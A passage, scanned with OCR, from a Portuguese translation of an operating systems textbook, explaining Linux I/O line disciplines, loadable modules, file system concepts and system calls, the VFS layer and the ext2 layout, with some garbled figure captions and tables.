apagados podem ser removidos), retornos de carros po- 
dem ser mapeados em alimentações de linhas e outros 
processamentos especiais podem ser completados. No 
entanto, se um processo quer interagir com todos os ca- 
racteres, ele pode colocar a linha em modo bruto, caso 
em que a disciplina de linha será contornada. Nem todos 
os dispositivos têm disciplinas de linha. 


A saída funciona de uma maneira similar, expandin- 
do tabs para espaços, convertendo alimentações de linha 
em retornos de carro + alimentações de linha, adicio- 
nando caracteres de preenchimento seguindo retornos 
de carros em terminais mecânicos lentos, e assim por 
diante. Assim como a entrada, a saída pode passar pela 
disciplina de linhas (modo processado) ou contorná-la 
(modo bruto). O modo bruto é especialmente útil quan- 
do enviando dados binários para outros computadores 
através de uma linha serial e para outras GUIs. Aqui, 
nenhuma conversão é desejada. 

A interação com dispositivos de rede é diferen- 
te. Embora os dispositivos de rede também produzam/ 
consumam fluxos de caracteres, sua natureza assincro- 
na os torna menos adequados para a integração fácil 
sob a mesma interface que os outros dispositivos de 
caracteres. O driver de dispositivo de rede produz pa- 
cotes consistindo de múltiplos bytes de dados, junto 
com cabeçalhos de rede. Esses pacotes são então rote- 
ados através de uma série de drivers de protocolos, e 
em última análise passados para a aplicação do espaço 
usuário. Uma estrutura de dados fundamental é a es- 
trutura de buffer de soquete, skbuff, que é usada para 
representar porções da memória preenchidas com da- 
dos do pacote. Os dados no buffer skbuff nem sempre 
começam no princípio do buffer. À medida que eles 
são processados por vários protocolos na pilha de rede, 
os cabeçalhos de protocolos podem ser removidos, ou 
adicionados. Os processos usuários interagem com 
dispositivos de rede através de sockets, que no Linux 
suportam o API soquete BSD original. Os drivers de 
protocolo podem ser contornados e o acesso direto ao 
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dispositivo de rede subjacente é habilitado através de 
raw sockets. Apenas o superusuário pode criar soque- 
tes brutos. 


10.5.5 Módulos no Linux 


Por décadas, drivers de dispositivos UNIX eram 
estaticamente ligados ao núcleo de maneira que eles 
estavam todos presentes na memória sempre que o sis- 
tema era inicializado. Dado o ambiente no qual o Linux 
cresceu, comumente minicomputadores departamentais 
e então estações de trabalho sofisticadas, com seus con- 
juntos pequenos e inalterados de dispositivos de E/S, 
esse esquema funcionava bem. Basicamente, um centro 
de computadores construía um núcleo contendo drivers 
para os dispositivos de E/S e isso era tudo. Se no ano 
seguinte o centro comprava um disco novo, ele ligava 
novamente o núcleo. Nada de especial. 

Com a chegada do Linux na plataforma PC, subita- 
mente tudo isso mudou. O número de dispositivos de 
E/S disponíveis no PC é muito maior do que em qual- 
quer minicomputador. Além disso, embora os usuários 
do Linux tenham (ou possam conseguir facilmente) 
todo o código fonte, provavelmente a vasta maioria 
teria uma dificuldade considerável em acrescentar um 
driver, atualizar todas as estruturas de dados relacio- 
nadas ao driver de dispositivo, religar o núcleo e então 
instalá-lo como o sistema inicializável (sem mencio- 
nar lidar com o resultado de construir um núcleo que 
não inicializa). 

O Linux solucionou esse problema com o conceito 
de módulos carregáveis. Esses são blocos de códigos 
que podem ser carregados no núcleo enquanto o sistema 
está executando. Mais comumente esses são drivers de 
dispositivos de bloco ou caracteres, mas eles também 
podem ser sistemas de arquivos inteiros, protocolos de 
rede, ferramentas de monitoramento de desempenho, ou 
qualquer coisa desejada. 

Quando um módulo é carregado, várias coisas têm 
de acontecer. Primeiro, o módulo tem de ser realoca- 
do dinamicamente durante o carregamento. Segundo, o 
sistema precisa conferir para ver se os recursos que o 
driver necessita estão disponíveis (por exemplo, níveis 
de solicitação de interrupção) e se afirmativo, marcá-los 
como em uso. Terceiro, quaisquer vetores de interrup- 
ção que forem necessários precisam ser configurados. 
Quarto, a tabela de troca de driver apropriada tem de 
ser atualizada para lidar com o novo tipo de dispositivo 
principal. Por fim, é permitido ao driver executar para 
desempenhar qualquer inicialização específica de dis- 
positivo que ele possa precisar. Uma vez que todos esses 


passos tenham sido completados, o driver é completa- 
mente instalado, do mesmo modo que qualquer driver 
instalado estaticamente. Outros sistemas UNIX moder- 
nos agora também suportam módulos carregáveis. 


10.6 O sistema de arquivos Linux 


A parte mais visível de qualquer sistema operacio- 
nal, incluindo Linux, é o sistema de arquivos. Nas se- 
ções a seguir, examinaremos as ideias básicas por trás 
do sistema de arquivos Linux, as chamadas de sistema, 
e como o sistema de arquivos é implementado. Algu- 
mas dessas ideias são derivadas do MULTICS, e muitas 
delas foram copiadas pelo MS-DOS, Windows e outros 
sistemas, mas outras são únicas para sistemas basea- 
dos no UNIX. O projeto do Linux é especialmente in- 
teressante porque ele claramente ilustra o princípio de 
O pequeno é belo. Com um mecanismo mínimo e um 
número muito limitado de chamadas de sistema, o Li- 
nux mesmo assim proporciona um sistema de arquivos 
elegante e poderoso. 


10.6.1 Conceitos fundamentais 


O sistema de arquivos Linux inicial foi o sistema 
de arquivos do MINIX 1. No entanto, como ele limita- 
va os nomes de arquivos a 14 caracteres (a fim de ser 
compatível com a Versão 7 do UNIX) e seu tamanho 
de arquivos máximo era 64 MB (o que era um exage- 
ro nos discos rígidos de 10 MB da sua época), havia 
um interesse em melhores sistemas de arquivos desde 
o início do desenvolvimento do Linux, que começou 
aproximadamente 5 anos após o lançamento do MINIX 
1. A primeira melhoria foi o sistema de arquivos ext, 
que permitiu nomes de arquivos de 255 caracteres e ar- 
quivos de 2 GB, mas era mais lento que o sistema de 
arquivos MINIX 1, de maneira que a busca continuou 
por um tempo. Finalmente, o sistema de arquivos ext2 
foi inventado, com nomes longos de arquivos, arquivos 
longos e melhor desempenho, e ele tornou-se o princi- 
pal sistema de arquivos. No entanto, o Linux suporta 
várias dúzias de sistemas de arquivos usando a camada 
do Virtual File System (VFS — Sistema de arquivos 
virtual), descrito na próxima seção. Quando o Linux 
é ligado, uma escolha de quais sistemas de arquivos 
devem ser compilados no núcleo é oferecida. Outros 
podem ser carregados dinamicamente como módulos 
durante a execução, se necessário. 

Um arquivo Linux é uma sequência de O ou mais 
bytes contendo informações arbitrárias. Nenhuma 


distinção é feita entre os arquivos ASCII, arquivos bi- 
nários, ou qualquer outro tipo de arquivos. O significa- 
do dos bits em um arquivo fica a cargo inteiramente do 
proprietário do arquivo. O sistema não se importa com 
isso. Nomes de arquivos são limitados a 255 caracteres 
e todos os caracteres ASCII exceto NUL são permiti- 
dos nos nomes dos arquivos, então um nome de arquivo 
consistindo de três retornos de carros é um nome de ar- 
quivo legal (mas não especialmente conveniente). 

Por convenção, muitos programas esperam que os 
nomes de arquivos consistam de um nome base e uma 
extensão, separados por um ponto (que conta como um 
caractere). Desse modo, prog.c é tipicamente um pro- 
grama C, prog.py é tipicamente um programa Python 
e prog.o é normalmente um arquivo objeto (saída de 
compilador). Essas convenções não são exigidas pelo 
sistema operacional, mas alguns compiladores e outros 
programas as esperam. As extensões podem ser de qual- 
quer comprimento, e os arquivos podem ter múltiplas 
extensões, como em prog.java.gz, que é provavelmente 
um programa Java comprimido gzip. 

Arquivos podem ser agrupados em diretórios por 
conveniência. Diretórios são armazenados como ar- 
quivos e até certo ponto tratados como tal. Diretórios 
podem conter subdiretórios, levando a um sistema de 
arquivos hierárquico. O diretório raiz é chamado / e 
sempre contém diversos subdiretórios. O caractere / 
também é usado para separar nomes de diretórios, de 
maneira que o nome /usr/ast/x denota o arquivo x loca- 
lizado no diretório ast, que em si está no diretório /usr. 
Alguns dos principais diretórios próximos do topo das 
árvores são mostrados na Figura 10.23. 

Ha duas maneiras de se especificar nomes de arqui- 
vos no Linux, tanto para o shell e quando abrindo um 
arquivo de dentro de um programa. A primeira maneira 
é através de um caminho absoluto, que significa di- 
zer como chegar ao arquivo começando no diretório 
raiz. Um exemplo de um caminho absoluto é /usr/ast/ 
books/mos4/chap-10. Isso diz para o sistema procurar 


(FIGURA 10.23] Alguns diretórios importantes encontrados na 


maioria dos sistemas Linux. 
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no diretório raiz por um diretório chamado usr, então 
procurar por outro diretório, ast. Por sua vez, esse dire- 
tório contém um diretório books, que contém o diretório 
mos4, que contém o arquivo chap-10. 

Nomes de caminhos absolutos são muitas vezes lon- 
gos e inconvenientes. Por essa razão, o Linux permite 
aos usuários e processos que designem o diretório no 
qual eles estão trabalhando atualmente como o diretó- 
rio de trabalho. Nomes de caminhos podem ser espe- 
cificados em relação ao diretório de trabalho. Um nome 
de caminho especificado em relação ao diretório de tra- 
balho é um caminho relativo. Por exemplo, se /usr/ast/ 
books/mos4 é o diretório de trabalho, então o comando 
shell 


cp chap-10 backup-10 


tem exatamente o mesmo efeito que o comando mais 
longo. 


cp /usr/ast/books/mos4/chap-10 /usr/ast/books/ 


mos4/backup-10 


Ocorre frequentemente que um usuário precise re- 
ferir-se a um arquivo que pertence a outro usuário, ou 
pelo menos está localizado em outra parte na árvore de 
arquivos. Por exemplo, se dois usuários estão compar- 
tilhando um arquivo, ele estará localizado em um dire- 
tório pertencente a um deles, de maneira que o outro 
terá de usar um nome de caminho absoluto para referir- 
-se a ele (ou mudar o diretório de trabalho). Se isso for 
longo o suficiente, pode tornar-se irritante ter de seguir 
digitando-o. O Linux fornece uma solução ao permitir 
que os usuários façam uma nova entrada de diretório 
que aponta para um arquivo existente. Essa entrada é 
chamada de ligação (link). 

Como um exemplo, considere a situação da Figura 
10.24(a). Fred e Lisa estão trabalhando juntos em um 
projeto, e cada um deles precisa acessar os arquivos do 
outro. Se Fred tem /usr/fred como seu diretório de tra- 
balho, ele pode referir-se ao arquivo x no diretório de 
Lisa como /usr/lisa/x. Alternativamente, Fred pode criar 
uma nova entrada no seu diretório, como mostrado na 
Figura 10.24(b), após a qual ele pode usar x para signi- 
ficar /usr/lisa/x. 

No exemplo discutido há pouco, sugerimos que 
antes de realizar a ligação, a única maneira para Fred 
referir-se ao arquivo x de Lisa era usando o seu caminho 
absoluto. Na realidade, isso não é de fato verdadeiro. 
Quando um diretório é criado, duas entradas, . e .., são 
automaticamente feitas nele. A primeira refere-se ao 
diretório de trabalho em si. A segunda refere-se ao pai 
do diretório, isto é, o diretório no qual ele mesmo está 
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eE (a) Antes da ligação. (b) Depois da ligação. 





fred lisa 
a x 
b y 
c z 


(a) 


listado. Desse modo, a partir de /usr/fred, outro cami- 
nho para o arquivo x de Lisa é ../lisa/x. 

Além dos arquivos regulares, o Linux também supor- 
ta arquivos especiais de caracteres e arquivos especiais 
de blocos. Arquivos especiais de caracteres são usados 
para modelar dispositivos de E/S seriais, como teclados 
e impressoras. A abertura e leitura de /dev/tty lê a partir 
do teclado; a abertura e leitura de /dev/lp escreve para a 
impressora. Arquivos especiais em bloco, muitas vezes 
com nomes como /dev/hd1, podem ser usados para ler e 
escrever partições de discos brutos sem levar em consi- 
deração o sistema de arquivos. Desse modo, uma busca 
para o byte k seguido por uma leitura começará lendo 
do k-ésimo byte na partição correspondente, ignorando 
completamente o i-nodo e estrutura de arquivos. Dis- 
positivos em bloco brutos são usados para paginação 
e troca por programas que criam sistemas de arquivos 
(por exemplo, mkfs) e por programas que consertam sis- 
temas de arquivos doentes (como fsck), por exemplo. 

Muitos computadores têm dois ou mais discos. Em 
computadores de grande porte em bancos, por exemplo, 
frequentemente é necessário ter 100 ou mais discos em 
uma única máquina, a fim de conter os enormes bancos 
de dados necessários. Mesmo computadores pessoais 
muitas vezes têm pelo menos dois discos — um disco 
rígido e uma unidade ótica (por exemplo, DVD). Quan- 
do há múltiplas unidades de disco, surge a questão de 
como tratá-las. 

Uma solução é colocar um sistema de arquivos au- 
tocontido em cada uma e apenas mantê-las separadas. 
Considere, por exemplo, a situação mostrada na Figura 
10.25(a). Aqui temos um disco rígido, que chamaremos 
de C:, eum DVD, que chamaremos de D:. Cada um tem 
seu próprio diretório raiz e arquivos. Com essa solução, 
o usuário tem de especificar tanto o dispositivo quanto 
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o arquivo quando qualquer outra coisa além do padrão 
for necessária. Por exemplo, para copiar um arquivo x 
para um diretório d (presumindo que C: seja o padrão), 
você digitaria 

cp D:/x /a/d/x 


Essa é a abordagem adotada por uma série de siste- 
mas, incluindo Windows 8, que ele herdou do MS-DOS 
muito tempo atrás. 

A solução Linux é permitir que um disco seja mon- 
tado sobre a árvore de arquivos de outro disco. Em 
nosso exemplo, poderíamos montar o DVD no dire- 
tório /b, resultando no sistema de arquivos da Figura 
10.25(b). O usuário agora vê uma única árvore de ar- 
quivos, e não precisa mais estar ciente de qual arquivo 
reside em qual dispositivo. O comando de cópia acima 
agora torna-se 


cp /b/x /a/d/x 


exatamente o mesmo que ele seria se tudo estivesse no 
disco rígido em primeiro lugar. 

Outra propriedade interessante do sistema de arquivos 
Linux éo travamento (locking). Em algumas aplicações, 
dois ou mais processos podem estar usando o mesmo ar- 
quivo ao mesmo tempo, o que pode levar a condições de 
corrida. Uma solução é programar a aplicação com regi- 
ões críticas. No entanto, se os processos pertencem a usu- 
ários independentes que nem conhecem uns aos outros, 
esse tipo de coordenação geralmente é inconveniente. 

Considere, por exemplo, um banco de dados con- 
sistindo em muitos arquivos em um ou mais diretórios 
que são acessados por usuários não relacionados. De- 
certo, é possível associar um semáforo a cada diretório 
ou arquivo e conseguir a exclusão mútua fazendo que 
os processos realizem uma operação down no semáforo 
apropriado antes de acessar os dados. A desvantagem, 
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[FIGURA 10.25] (a) Sistemas de arquivos separados. (b) Após a montagem. 
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no entanto, é que um diretório inteiro ou arquivo torna- 
-se então inacessível, mesmo que apenas um registro 
seja necessário. 

Por essa razão, POSIX fornece um mecanismo fle- 
xível e de granularidade fina para os processos trava- 
rem tão pouco quanto um único byte e tanto quanto um 
arquivo inteiro em uma operação indivisível. O meca- 
nismo de travamento exige que o chamador especifique 
o arquivo a ser travado, o byte iniciador e o número 
de bytes. Se a operação for bem-sucedida, o sistema 
faz uma entrada de tabela observando que os bytes em 
questão (por exemplo, um registro de banco de dados) 
estão travados. 

Dois tipos de travas são fornecidos: travas com- 
partilhadas e travas exclusivas. Se uma porção de 
um arquivo já contém uma trava compartilhada, uma 
segunda tentativa para colocar uma trava compartilhada 
nele é permitida, mas uma tentativa de colocar uma tra- 
va exclusiva fracassará. Se uma porção de um arquivo 
contém uma trava exclusiva, todas as tentativas de tra- 
var qualquer parte daquela porção fracassarão até que a 
trava tenha sido liberada. A fim de colocar com sucesso 
uma trava, cada byte na região a ser travada tem de estar 
disponível. 

Quando coloca uma trava, um processo precisa es- 
pecificar se ele quer ser bloqueado ou não caso a trava 
não possa ser colocada. Se ele escolher ser bloqueado, 
quando a trava existente tiver sido removida, o proces- 
so é desbloqueado e a trava é colocada. Se o processo 
escolher não ser bloqueado quando ele não puder co- 
locar uma trava, a chamada de sistema retorna imedia- 
tamente, com o código de status dizendo se a trava foi 
bem-sucedida ou não. Se ela não foi bem-sucedida, o 
chamador tem de decidir o que fazer em seguida (por 
exemplo, esperar e tentar de novo). 


Regiões travadas podem sobrepor-se. Na Figura 
10.26(a) vemos que o processo 4 colocou uma trava 
compartilhada nos bytes 4 até o 7 de algum arquivo. 
Mais tarde, o processo B coloca uma trava comparti- 
lhada nos bytes 6 até o 9, como mostrado na Figura 
10.26(b). Por fim, o Ctrava os bytes 2 até o 11. Enquan- 
to todas essas travas forem compartilhadas, elas podem 
coexistir. 

Agora considere o que acontece se um processo tenta 
adquirir uma trava exclusiva para o byte 9 do arquivo da 
Figura 10.26(c), com uma solicitação para ser bloqueado 
se a trava falhar. Tendo em vista que duas travas anteriores 
cobrem esse bloco, o chamador será bloqueado e perma- 
necerá assim até que ambos, B e C, liberem suas travas. 


10.6.2 Chamadas de sistema de arquivos no 
Linux 


Muitas chamadas de sistemas relacionam-se a arqui- 
vos e ao sistema de arquivos. Primeiro, examinaremos 
as chamadas de sistema que operam em arquivos indivi- 
duais. Mais tarde examinaremos aquelas que envolvem 
diretórios ou o sistema de arquivos como um todo. Para 
criar um arquivo novo, pode ser usada a chamada creat. 
(Quando perguntaram certa vez a Ken Thompson se ele 
faria diferente se ele tivesse a chance de reinventar o 
UNIX, ele respondeu que escreveria creat como create 
dessa vez.) Os parâmetros proporcionam o nome do ar- 
quivo e o modo de proteção. Desse modo 


fd = creat(“abc”, mode); 


cria um arquivo chamado abc com os bits de proteção 
tirados de mode. Esses bits determinam quais usuários 
podem acessar o arquivo e como. Eles serão descritos 
mais tarde. 
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ale a (a) Um arquivo com uma trava. (b) Acréscimo de uma segunda trava. (c) Uma terceira trava. 
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A chamada creat não apenas cria um novo arquivo, 
mas também o abre para a escrita. Para permitir que 
chamadas subsequentes do sistema acessem o arqui- 
vo, um creat bem-sucedido retorna um pequeno inteiro 
não negativo chamado de descritor de arquivos, fd no 
exemplo acima. Se um creat for feito em um arquivo 
existente, esse arquivo é truncado até o comprimento 0 
e seus conteúdos descartados. Arquivos também podem 
ser criados usando a chamada open com os argumentos 
apropriados. 

Agora vamos continuar examinando as principais 
chamadas do sistema de arquivos, que estão listadas 
na Figura 10.27. Para ler ou escrever em um arquivo 
existente, ele deve primeiro ser aberto chamando open 
ou creat. Essa chamada especifica o nome do arquivo a 
ser aberto e como ele deve ser aberto: para leitura, es- 
crita ou ambos. Várias opções podem ser especificadas 
também. Como creat, a chamada para open retorna um 
descritor de arquivos que pode ser usado para leitura ou 
escrita. Depois disso, o arquivo pode ser fechado por 
close, o que disponibiliza o descritor de arquivos para 
ser reutilizado em um creat ou open subsequente. As 
chamadas creat e open sempre retornam o descritor de 
arquivos de numeração mais baixa que não está em uso 
no momento. 

Quando um programa começa a executar da maneira 
padrão, os descritores de arquivos 0, 1 e 2 já estão aber- 
tos para a entrada padrão, saída padrão e erro padrão, 
respectivamente. Dessa maneira, um filtro, como o pro- 
grama sort, pode apenas ler sua entrada do descritor 


de arquivos 0 e escrever sua saída para o descritor de 
arquivos 1, sem ter de saber quais arquivos eles são. 
Esse mecanismo funciona porque o shell arranja para 
que esses valores se refiram aos arquivos corretos (redi- 
recionados) antes de o programa ser iniciado. 

As chamadas mais comumente usadas são sem dúvi- 
da read e write. Cada uma tem três parâmetros: um des- 
critor de arquivos (dizendo qual arquivo aberto ler ou 
escrever), um endereço de buffer (dizendo onde colocar 
os dados ou de onde tirá-los) e uma contagem (dizendo 
quantos bytes transferir). Isso é tudo. Trata-se de um 
projeto muito simples. Uma chamada típica é 


n = read(fd, buffer, nbytes); 


Embora quase todos os programas leiam e escrevam 
arquivos sequencialmente, alguns precisam ser capa- 
zes de acessar qualquer parte de um arquivo ao acaso. 
Associado com cada arquivo há um ponteiro que in- 
dica a posição atual no arquivo. Quando lendo (ou es- 
crevendo) sequencialmente, em geral ele aponta para o 
próximo byte a ser lido (escrito). Se o ponteiro estiver 
em, digamos, 4.096, antes que 1.024 bytes sejam lidos, 
ele automaticamente será movido para 5.120 após uma 
chamada de sistema read bem-sucedida. A chamada 
Iseek muda o valor do ponteiro de posição, de maneira que 
chamadas subsequentes para read ou write podem come- 
çar em qualquer parte no arquivo, ou mesmo além do seu 
término. Ela é chamada Iseek para evitar confusão com 
seek, uma chamada hoje em dia obsoleta que anterior- 
mente era usada em computadores de 16 bits para buscas. 
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Jei: TENA Algumas chamadas de sistema relacionadas a arquivos. O código de retorno s é —1 se ocorrer algum erro; fd é um 
descritor de arquivo e position é um offset de arquivo. Os parâmetros são autoexplicativos. 





Chamada de sistema 


Descrição 





fd = creat(nome, modo) 


fd = open(arquivo, como, ...) 


Uma maneira de criar um novo arquivo 


Abre um arquivo para leitura, escrita ou ambos 





s = close(fd); 


Fecha um arquivo aberto 





n = read(fd, buffer, nbytes) 


Lê dados de um arquivo para um buffer 





n = write(fd, buffer, nbytes) 


Escreve dados de um buffer para um arquivo 





posicao = Iseek(fd, deslocamento, de-onde) 


Move o ponteiro do arquivo 





s = stat(nome, &buf) 


Obtém a informação de estado do arquivo 





s = fstat(fd, &buf) 


Obtém a informação de estado do arquivo 





s = pipe(8fd[0]) 


Cria um pipe 
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s = fentl(fd, comando, ...) 








Trava de arquivo e outras operações 





Lseek tem três parâmetros: o primeiro é o descritor 
de arquivos para o arquivo; o segundo é a posição do 
arquivo; o terceiro diz se a posição do arquivo é re- 
lativa ao início do arquivo, a posição atual, ou o fim 
do arquivo. O valor retornado por Iseek é a posição 
absoluta no arquivo após o ponteiro do arquivo ter sido 
modificado. De maneira ligeiramente irônica, Iseek é a 
única chamada de sistema de arquivos que jamais cau- 
sa uma busca de disco real, pois tudo o que ela faz é 
atualizar a posição do arquivo atual, que é um número 
na memória. 

Para cada arquivo, o Linux controla o modo do ar- 
quivo (regular, diretório, arquivo especial), tamanho, 
horário da última modificação e outras informações. 
Os programas podem pedir para ver essa informação 
através da chamada de sistema stat. O primeiro para- 
metro é o nome do arquivo. O segundo é um pontei- 
ro para uma estrutura em que a informação solicitada 
deve ser colocada. Os campos na estrutura são mostra- 
dos na Figura 10.28. A chamada fstat é a mesma que 
stat exceto por ela operar em um arquivo aberto (cujo 
nome pode não ser conhecido) em vez de no nome do 
caminho. 

A chamada de sistema pipe é usada para criar pipe- 
lines de shell. Ela cria uma espécie de pseudoarquivo, 
que armazena os dados entre os componentes do pipe- 
line e retorna descritores de arquivos tanto para leitura 
quanto para escrita no buffer. Em um pipeline como 


sort <in | head —30 


o descritor de arquivo 1 (saída padrão) no processo exe- 
cutando sort seria configurado (pelo shell) para escrever 
para o pipe, e o descritor de arquivos 0 (entrada padrão) 


(eU Isa LE Os campos retornados pela chamada de sistema 
stat. 





Dispositivo onde está o arquivo 





Número do i-nodo (qual arquivo do dispositivo) 





Modo do arquivo (inclui informação de proteção) 





Número de ligações para o arquivo 





Identificação do proprietário do arquivo 





Grupo ao qual pertence o arquivo 





Tamanho do arquivo (em bytes) 





Hora da criação 





Hora do último acesso 





Hora da última modificação 








no processo executando head seria configurado para ler 
a partir do pipe. Dessa maneira, sort simplesmente lê do 
descritor de arquivos 0 (configurado para o arquivo in) e 
escreve para o descritor de arquivos 0 (o pipe) sem nem 
ter ciência de que estes foram redirecionados. Se eles 
não tiverem sido redirecionados, sort automaticamente 
lerá do teclado e escreverá para a tela (os dispositivos 
padrão). Similarmente, quando head lê do descritor de 
arquivos 0, ele está lendo os dados que sort colocou no 
buffer do pipe sem nem saber que um pipe estava sendo 
usado. Trata-se de um exemplo claro de como um concei- 
to simples (redirecionamento) com uma implementação 
simples (descritores de arquivos 0 e 1) pode levar a uma 
ferramenta poderosa (conectando programas de maneiras 
arbitrárias sem ter de modificá-los em nada). 
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A última chamada de sistema na Figura 10.27 é fentl. 
Ela é usada para travar e destravar arquivos, aplicar travas 
compartilhadas ou exclusivas e realizar algumas outras 
operações específicas de arquivos. 

Agora vamos examinar algumas chamadas de siste- 
ma que se relacionam mais a diretórios ou ao sistema de 
arquivos como um todo, em vez de apenas um arquivo 
específico. Algumas chamadas comuns estão listadas na 
Figura 10.29. Diretórios são criados e destruídos usan- 
do mkdir e rmdir, respectivamente. Um diretório pode 
ser removido somente se ele estiver vazio. 

Como vimos na Figura 10.24, a ligação com um 
arquivo cria uma nova entrada de diretório que aponta 
para um arquivo existente. A chamada de sistema link 
cria o link. Os parâmetros especificam os nomes ori- 
ginais e novos, respectivamente. Entradas de diretórios 
são removidas com unlink. Quando o último link para 
um arquivo é removido, o arquivo é automaticamente 
excluído. Para um arquivo que nunca foi ligado, o pri- 
meiro unlink faz que ele desapareça. 

O diretório de trabalho é modificado pela chamada 
de sistema chdr. Fazê-lo tem o efeito de modificar a in- 
terpretação de nomes de caminhos relativos. 

As últimas quatro chamadas da Figura 10.29 são para 
a leitura de diretórios. Eles podem ser abertos, fechados e 
lidos, de maneira análoga a arquivos comuns. Cada cha- 
mada para readdir retorna exatamente uma entrada de 
diretório em um formato fixo. Não há como os usuários 
escreverem em um diretório (a fim de manter a integri- 
dade do sistema de arquivos). Arquivos podem ser acres- 
centados a um diretório usando creat ou link e removidos 
usando unlink. Não há também como buscar um arquivo 
específico em um diretório, mas rewinddir permite que um 
diretório aberto seja lido novamente desde o princípio. 


10.6.3 Implementação do sistema de arquivos do 
Linux 


Nesta seção examinaremos primeiro as abstrações 
suportadas pela camada de Sistema de Arquivos Virtual 
(VFS, Virtual File System). O VFS esconde de processos e 
aplicações de nível mais alto as diferenças entre os muitos 
tipos de sistemas de arquivos suportados pelo Linux, se 
eles estiverem residindo em dispositivos locais ou estive- 
rem armazenados remotamente e precisarem ser acessados 
pela rede. Dispositivos e outros arquivos especiais também 
são acessados através da camada VFS. Em seguida, des- 
creveremos a implementação do primeiro sistema de ar- 
quivos Linux disseminado, ext2, ou o segundo sistema de 
arquivos estendido. Depois, discutiremos as melhorias no 
sistema de arquivos ext4. Uma ampla variedade de outros 
sistemas de arquivos também é usada. Todos os sistemas 
Linux podem lidar com múltiplas partições de discos, cada 
uma com um sistema de arquivos diferente nela. 


O sistema de arquivos virtual do Linux 


A fim de habilitar as aplicações a interagirem com 
sistemas de arquivos diferentes, implementadas em ti- 
pos diferentes de dispositivos locais ou remotos, o Li- 
nux adota uma abordagem usada em outros sistemas 
UNIX: o Sistema de Arquivos Virtual (VFS). O VFS 
define um conjunto de sistemas de arquivos básicos e as 
operações que são permitidas nessas abstrações. Invo- 
cações das chamadas de sistema descritas na seção an- 
terior acessam as estruturas de dados VFS, determinam 
o sistema de arquivos exato ao qual arquivo acessado 
pertence, e através de ponteiros de função armazenados 


ale LR] Algumas chamadas de sistema relacionadas a diretórios. O código de retorno s é —1 se ocorrer algum erro; dir identifica 
uma cadeia de diretórios e entradir é uma entrada de diretório. Os parâmetros são autoexplicativos. 





Chamada de sistema 


Descrição 





s = mkdir(caminho, modo) 


Cria um novo diretório 





s = rmdir(caminho) 


Remove um diretório 





s = link(caminho velho, caminho novo) 


Cria uma ligação para um arquivo existente 





s = unlink(caminho) 


Remove a ligação para um arquivo 





s = chdir(caminho) 


dir = opendir(caminho) 


Troca o diretório atual 


Abre um diretório para leitura 





s = closedir(dir) 


Fecha um diretório 





entradir = readdir(dir) 


Lê uma entrada do diretório 





rewinddir(dir) 








Rebobina um diretório de modo que ele possa ser lido novamente 








nas estruturas de dados VFS invocam a operação cor- 
respondente no sistema de arquivos especificado. 

A Figura 10.30 resume as quatro estruturas de sis- 
temas de arquivos principais suportadas pelo VFS. O 
superbloco contém informações críticas a respeito do 
layout do sistema de arquivos. A destruição do super- 
bloco tornará o sistema de arquivos ilegível. Cada i- 
-nodo (abreviatura de nodo-índice — index node —, 
mas nunca chamados assim, embora algumas pessoas 
preguiçosas deixem de usar o hífen e os chamem de ino- 
dos) descreve exatamente um arquivo. Observe que no 
Linux, os diretórios e os dispositivos também são repre- 
sentados como arquivos, desse modo eles terão i-nodos 
correspondentes. Superblocos e i-nodos têm uma estru- 
tura correspondente mantida no disco físico onde reside 
o sistema de arquivos. 

A fim de facilitar determinadas operações de diretó- 
rio e caminhos transversais, como /usr/ast/bin, o VFS 
suporta uma estrutura de dados dentry que representa 
uma entrada de diretório. Essa estrutura de dados é cria- 
da dinamicamente pelo sistema de arquivos. Entradas 
de diretório são armazenadas em cache no que é cha- 
mado de dentry cache. Por exemplo, o dentry cache 
conteria entrada para /, /usr, /usr/ast e assemelhados. Se 
múltiplos processos acessarem o mesmo arquivo atra- 
vés da mesma ligação estrita (isto é, mesmo caminho), 
seu objeto de arquivo apontará para a mesma entrada na 
sua cache. 

Por fim, a estrutura de dados arquivo é uma repre- 
sentação na memória de um arquivo aberto, e é criada 
em resposta à chamada de sistema open. Ela suporta 
operações como read, write, sendfile, lock e outras cha- 
madas de sistema descritas na seção anterior. 

Os sistemas de arquivos reais implementados por 
baixo do VFS não precisam usar exatamente as mesmas 
abstrações e operações internamente. Eles devem, no 
entanto, implementar operações de sistemas de arqui- 
vos semanticamente equivalentes aquelas especificadas 
com os objetos VFS. Os elementos das estruturas de 
dados das operações para cada um dos quatro objetos 
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VFS são ponteiros para funções no sistema de arquivos 
subjacente. 


O sistema de arquivos Ext2 do Linux 


Em seguida descrevemos um dos sistemas de arqui- 
vos em disco mais populares usados no Linux: ext2. O 
primeiro lançamento do Linux usou o sistema de ar- 
quivos MINIX 1 e foi limitado por nomes de arquivos 
curtos e tamanhos de arquivos de 64 MB. O sistema de 
arquivos MINIX 1 foi finalmente substituído pelo pri- 
meiro sistema de arquivos estendido, ext, que permitia 
tanto nomes de arquivos mais longos quanto tamanhos 
de arquivos maiores. Por causa de suas ineficiências de 
desempenho, ext foi substituído por seu sucessor, ext2, 
que ainda está sendo amplamente usado. 

Uma partição de disco Linux ext2 contém um siste- 
ma de arquivos com o layout mostrado na Figura 10.31. 
O bloco 0 não é usado pelo Linux e contém código para 
inicializar o computador. Seguindo o bloco 0, a partição 
do disco é dividida em grupos de blocos, desconside- 
rando onde vão cair os limites do cilindro. Cada grupo é 
organizado como a seguir. 

O primeiro bloco é o superbloco. Ele contém infor- 
mações sobre o layout do sistema de arquivos, incluin- 
do o número de i-nodos, o número de blocos de disco 
e o começo da lista de blocos de disco livres (em geral 
algumas centenas de entradas). Em seguida, vem o des- 
critor do grupo, que contém informações sobre a loca- 
lização dos mapas de bits, o número de blocos livres e 
i-nodos no grupo, e o número de diretórios no grupo. 
Essa informação é importante, tendo em vista que ext2 
tenta disseminar os diretórios uniformemente através do 
disco. 

Dois mapas de bits são usados para controlar os 
blocos livres e i-nodos livres, respectivamente, uma es- 
colha herdada do sistema de arquivos MINIX 1 (e ao 
contrário da maioria dos sistemas de arquivos UNIX, 
que usam uma lista livre). Cada mapa tem um bloco 
de comprimento. Com um bloco de 1 KB, esse projeto 














Abstrações de sistemas de arquivos fornecidos pelo VFS. 
Objeto Descrição Operação 
Superbloco | Sistema de arquivos específico read inode, sync Ís 
Dentry Entrada de diretório, componente único de um caminho | create, link 
I-nodo Arquivo específico d compare, d delete 
Arquivo Arquivo aberto associado a um processo read, write 
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(FIGURA 10.31 | Layout de disco do sistema de arquivos ext2 do Linux. 
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limita um grupo de blocos a 8.192 blocos e 8.192 i-no- 
dos. O primeiro é uma restrição real mas, na prática, 
o segundo não. Com blocos de 4 KB, os números são 
